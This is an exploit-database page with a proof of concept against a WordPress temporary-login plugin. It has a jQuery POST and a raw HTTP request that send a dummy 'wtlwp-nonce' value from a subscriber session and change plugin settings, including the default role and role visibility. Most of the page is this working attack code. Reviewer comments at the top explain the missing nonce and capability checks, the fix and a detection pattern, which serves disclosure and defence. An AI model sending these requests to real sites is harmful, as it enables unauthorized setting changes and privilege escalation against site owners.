## https://sploitus.com/exploit?id=WPEX-ID:15EED13F-3195-4F5D-8933-36695C830F4F
// Reproduction of a settings-update POST to the plugin's admin handler.
// The finding: "wtlwp-nonce" carries a placeholder value and the request
// is still processed, so the server never validates the nonce.
// NOTE(review): the raw request on this page uses a subscriber-level
// cookie, which suggests the handler also lacks a capability check — confirm
// against the plugin source. A fixed handler should verify the nonce
// (wp_verify_nonce / check_admin_referer) and the caller's capability
// (current_user_can) before it writes any setting.
// Detection: a body containing tlwp_settings_data[...] posted to
// /wp-admin/index.php from a non-administrator session is the pattern to
// alert on in WAF or request-body logs.
const settingsEndpoint = "https://example.com/wp-admin/index.php";

// Plugin settings the handler persists if it accepts the request.
const requestedSettings = {
  default_role: "editor",
  default_expiry_time: "month_after_access",
  visible_roles: ["editor", "administrator"],
  default_redirect_to: "wp_dashboard",
};

jQuery.post(settingsEndpoint, {
  "wtlwp-nonce": "foo", // arbitrary value; reported as not validated server-side
  tlwp_settings_data: requestedSettings,
});

POST /wp-admin/index.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Connection: close
Cookie: [subscriber+]

wtlwp-nonce=foo&tlwp_settings_data%5Bdefault_role%5D=editor&tlwp_settings_data%5Bdefault_expiry_time%5D=month_after_access&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=editor&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=administrator&tlwp_settings_data%5Bdefault_redirect_to%5D=wp_dashboard